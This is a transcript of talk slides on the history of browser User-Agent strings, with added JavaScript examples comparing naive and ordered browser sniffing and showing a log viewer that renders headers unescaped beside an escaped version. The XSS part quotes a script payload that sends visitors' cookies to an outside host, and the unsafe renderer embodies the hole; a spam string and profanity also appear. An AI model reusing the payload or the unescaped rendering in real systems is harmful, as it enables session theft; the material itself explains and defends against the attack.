A presentation at NLHTML5 in Enschede, Netherlands by Niels Leenheer
everybody lies NLHTML5 @ Nerds & Company, March 17th 2016
yes, this talk is about browser sniffing
why a talk about browser sniffing?
browser sniffing is dirty
you should use feature detection
why a talk about browser sniffing?
what is browser sniffing?
The HTTP specification defines the User-Agent header. It contains a string with information about the browser.
Every request the browser makes to the server includes the User-Agent header
GET http://whichbrowser.net/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: whichbrowser.net

HTTP/1.1 200 OK
Date: Mon, 08 Feb 2016 10:40:28 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT
ETag: "984-50cae11796432"
Accept-Ranges: bytes
Content-Length: 2436
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
You can access the exact same string from JavaScript as navigator.userAgent
You can use the User-Agent string to identify: the browser, the rendering engine, the operating system, the device model, and more
why browser sniffing is hard
things started out simple
Mosaic
Mosaic/1.0 (Win3.1)
"Mosaic" is the name of the browser, "1.0" the version of the browser, "Win3.1" the operating system.
Netscape Navigator
Mozilla/1.0 (Win3.1)
"Mozilla" is the code name of the browser, "1.0" the version of the browser, "Win3.1" the operating system.
but it quickly started to get complicated
Internet Explorer
Mozilla/1.0 (compatible; MSIE 1.0; Windows 95)
"Mozilla/1.0 (compatible;" claims compatibility with Netscape Navigator 1.0, "MSIE" is the name of the browser, "1.0" the version of the browser, "Windows 95" the operating system.
Opera
Opera/8.54 (Windows 95; U; en)
"Opera" is the name of the browser, "8.54" the version of the browser, "Windows 95" the operating system, "en" the English language, "U" United States level encryption.
Opera
Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0
"Opera" is the name of the browser, "10.00" the version of the browser, "Presto/2.2.0" the rendering engine.
Opera
Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.10
"Opera" is the name of the browser, "9.8" a fake version of the browser, "Version/10.10" the real version of the browser.
Firefox
Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.0.12) Gecko/20090706 Firefox/3.0.12
"Gecko" is the name of the rendering engine, "Firefox" the name of the browser, "20090706" the build date of the rendering engine, "3.0.12" the version of the browser, "rv:1.9.0.12" the version of the rendering engine.
Firefox
Mozilla/5.0 (Windows NT 6.0; rv:15.0) Gecko/20100101 Firefox/15.0
The build date is no longer updated: "Gecko/20100101" is frozen.
Firefox
Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0
The Gecko token now simply repeats the Firefox version.
and it gets worse…
Safari
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3
"Safari" is the name of the browser; the version of the browser is in "Version/3.2.3", not in the number after "Safari/", which is a build number.
Chrome
Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/525.28.3
"Chrome/15.0.874.120" carries the name and the version of the browser; the rest is Safari's string.
Opera
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180
"OPR/31.0.1889.180" carries the name and the version of the browser; the rest is Chrome's string.
Internet Explorer
Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
"rv:11.0" is the version of the browser; the "MSIE" token is gone.
Edge
Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162
"Edge/12.10162" carries the name and the version of the browser; the rest is Chrome's string.
and those were all relatively normal User-Agent strings
“User-Agent strings only get larger over time, never smaller” Niels’s second law of User-Agent strings
Samsung Internet
Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
"SAMSUNG GT-I9505" identifies the Samsung device, "Version/1.5" the version of the browser; no token carries the browser's name.
Nokia Xpress for Windows Phone
Mozilla/5.0 (Series40; NOKIALumia800; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.8.0.50.5
A Windows Phone browser announcing itself as a Series40 phone with a Gecko engine.
LG Netcast
Mozilla/5.0 (X11; Linux; ko-KR) AppleWebKit/534.26+ (KHTML, like Gecko) Version/5.0 Safari/534.26+
Nothing identifies the LG platform; the string reads like a desktop Safari build on Linux.
Sometimes browsers include a compatibility mode or a desktop mode that deliberately changes the User-Agent string
Opera
Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50
"Opera" is the name of the browser, "X11; Linux" the name of the operating system, "Version/11.50" the version of the browser.
Opera Mobile (desktop mode)
Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50
The same string: "zbov" is "mobi" encoded with ROT13, the only hint that this is Opera Mobile pretending to be a desktop browser.
Internet Explorer
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
"MSIE 8.0" is the browser version as claimed.
Internet Explorer (compatibility view)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
The same string: "Trident/5.0" means it is really Internet Explorer 9 (Trident/4.0 is IE 8, Trident/5.0 IE 9, Trident/6.0 IE 10, Trident/7.0 IE 11), whatever the MSIE token says.
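An added example, not from the talk, of why the strings above defeat hand-rolled sniffing: a first-match check written in the order the browsers appeared (MSIE, then Firefox, then Safari) misreads Chrome, Opera, Edge and Samsung Internet as Safari, misses IE 11 entirely and takes the compatibility-view string at its word, while a version that tests the most specific token first and maps Trident to the real IE version gets them right. The sample strings are the ones on the slides (with the stray space in the Samsung string removed); both sniffers are constructed for this illustration and are toys, not a library to use.

```javascript
// Added example, not from the talk: why hand-rolled sniffing breaks.
// Constructed sample input: User-Agent strings copied from the slides.
const samples = {
  safari: "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3",
  chrome: "Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/525.28.3",
  opera: "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180",
  edge: "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162",
  ie11: "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko",
  ie9compat: "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)",
  firefox: "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0",
  samsung: "Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36",
};

// The check that shows up in a lot of hand-rolled code: test for the
// browsers in the order they appeared on the web, first hit wins.
function naiveSniff(ua) {
  let m;
  if ((m = ua.match(/MSIE (\d+)/))) return { name: "Internet Explorer", version: m[1] };
  if ((m = ua.match(/Firefox\/(\d+)/))) return { name: "Firefox", version: m[1] };
  if ((m = ua.match(/Safari\/(\d+)/))) return { name: "Safari", version: m[1] };
  return { name: "unknown", version: null };
}

// Same idea, but the most specific token is tested first and the version is
// read from the token that actually carries it. Trident N maps to IE N+4
// (Trident/4.0 = IE 8 ... Trident/7.0 = IE 11), which unmasks the
// compatibility-view string. Still a toy: real libraries carry thousands of
// such rules, which is the talk's point about not building your own.
const orderedRules = [
  { name: "Edge", re: /\bEdge\/(\d+)/ },
  { name: "Opera", re: /\bOPR\/(\d+)/ },
  { name: "Samsung Internet", re: /\bSAMSUNG\b.*\bVersion\/(\d+)/ },
  { name: "Chrome", re: /\bChrome\/(\d+)/ },
  { name: "Safari", re: /\bVersion\/(\d+).*\bSafari\// },
  { name: "Firefox", re: /\bFirefox\/(\d+)/ },
  { name: "Internet Explorer", re: /\bTrident\/(\d+)/, version: (m) => String(Number(m[1]) + 4) },
  { name: "Internet Explorer", re: /\bMSIE (\d+)/ },
];

function orderedSniff(ua) {
  for (const rule of orderedRules) {
    const m = ua.match(rule.re);
    if (m) return { name: rule.name, version: rule.version ? rule.version(m) : m[1] };
  }
  return { name: "unknown", version: null };
}

// Side-by-side result for every sample string.
function compare() {
  return Object.entries(samples).map(([label, ua]) => ({
    label,
    naive: naiveSniff(ua),
    ordered: orderedSniff(ua),
  }));
}

for (const row of compare()) {
  const naive = `${row.naive.name} ${row.naive.version ?? ""}`;
  const ordered = `${row.ordered.name} ${row.ordered.version ?? ""}`;
  console.log(`${row.label.padEnd(10)} naive: ${naive.padEnd(24)} ordered: ${ordered}`);
}
```

The ordered version is only right for the eight strings it was written against; the Nokia and LG strings above already fall through to "unknown" in both, and every new browser release can change the token order. That is the maintenance burden the talk says to hand to a library.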
And it is possible to change the User-Agent string yourself
spam
http://www.sexxlife.it/sexyshop (sexy shop - sexy toys, BDSM, vibratori, falli, vagine, lubrificanti, dvd porno, film hard, lingerie - Migliaia di articoli nel nostro sexy shop online.; http://www.sexxlife.it; info@sexxlife.it)
XSS attacks
<script>alert("My Little Pony");</script>
<script language="JavaScript">document.location= "http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;</script>
<img src="http://bravo.trollab.org/mylittlepony.png" alt="My Little Pony">
These are User-Agent strings as sent to the server. They do nothing there, but they run in the browser of whoever opens a log viewer or analytics page that writes the header into HTML without escaping it; the second one sends that person's cookies to the attacker.
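An added example, not from the talk, of the stored-XSS path the strings above are built for: a log viewer that concatenates the User-Agent header into markup, beside one that escapes it first, plus a cheap check a log pipeline can use to flag such entries. The malicious strings are the ones on the slide, used here as constructed sample input; the function names are this example's own.

```javascript
// Added example, not from the talk: the User-Agent header is untrusted input.
// Constructed sample input: one normal string plus the three from the slide.
const loggedUserAgents = [
  "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)",
  '<script>alert("My Little Pony");</script>',
  '<script language="JavaScript">document.location="http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;</script>',
  '<img src="http://bravo.trollab.org/mylittlepony.png" alt="My Little Pony">',
];

// Vulnerable: the header is concatenated straight into markup, so the script
// tags above run in the browser of whoever opens the log page (the second
// one sends that person's cookies to the attacker's host).
function renderLogUnsafe(entries) {
  return "<ul>" + entries.map((ua) => `<li>${ua}</li>`).join("") + "</ul>";
}

// Hardened: escape the characters that carry meaning in HTML text and
// attribute context before interpolating.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderLogSafe(entries) {
  return "<ul>" + entries.map((ua) => `<li>${escapeHtml(ua)}</li>`).join("") + "</ul>";
}

// A cheap pipeline check: a real User-Agent never contains angle brackets or
// control characters. Use it to flag entries for review, not as a substitute
// for escaping at the point of output.
function looksLikeInjection(ua) {
  return /[<>]|[\x00-\x1f\x7f]/.test(ua);
}

function flaggedEntries(entries) {
  return entries.filter(looksLikeInjection);
}

console.log(`${flaggedEntries(loggedUserAgents).length} of ${loggedUserAgents.length} entries flagged`);
console.log(renderLogSafe(loggedUserAgents));
```

When the viewer is built in the browser, assigning the string to `textContent` (or a templating engine that escapes by default) does the same job as `escapeHtml` here; `innerHTML` with a raw header is the vulnerable form.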
funny people
Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit)
Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Surface Zune Phone XL) AppleWebKit/537.36 (KHTML, like Gecko) ( °□°
angry people
FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) FuckYou/123.0 FuckingFox/321.0
Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) Presto/2.10.229 Version/11.62
Seriously, Go fuck yourself W3C standards are important. Stop fucking obsessing over user-agent already.
In 1.000.000 unique User-Agent strings: 108 x sex, 82 x fuck, 10 x shit, 9 x dick, 6 x ass, 4 x balls, 3 x vagina
User-Agent strings cannot be trusted!
Everybody lies
you should never use browser sniffing for controlling access to your website
you should never use browser sniffing for determining browser capabilities
you should never build your own browser sniffing library
what is browser sniffing good for?
Improve UX: if you know the platform or browser, you can streamline the user experience.
Analytics: if you know your users, you can build a better site for them.
Error logging: if you know which browser is causing problems, you can fix them.
Use a browser sniffing library that is regularly updated, and check whether its rule set can be updated automatically on a schedule.
Try libraries like UAParser (https://github.com/ua-parser), Piwik DeviceDetector (https://github.com/piwik/device-detector) or WhichBrowser (https://github.com/whichbrowser)
Please don't use WURFL because it is outdated and just not good
"If you tell a big enough lie and tell it frequently enough, it will be believed" — Gandhi
“If you tell a big enough lie and tell it frequently enough, it will be believed” — Adolf Hitler
Thank you!
This is a talk about browser sniffing. And yes, I do realise it is 2016. I know browser sniffing is ugly and we should all be using feature detection. But a quick search on GitHub still shows millions of lines of code referring to user agent strings. So this message clearly hasn't landed yet. But why is browser sniffing a bad choice? This talk will dive into history and show the origin of the user agent string and the hidden battle between browser makers and web developers. It will show its simple beginnings and the horrible monstrosity it has become.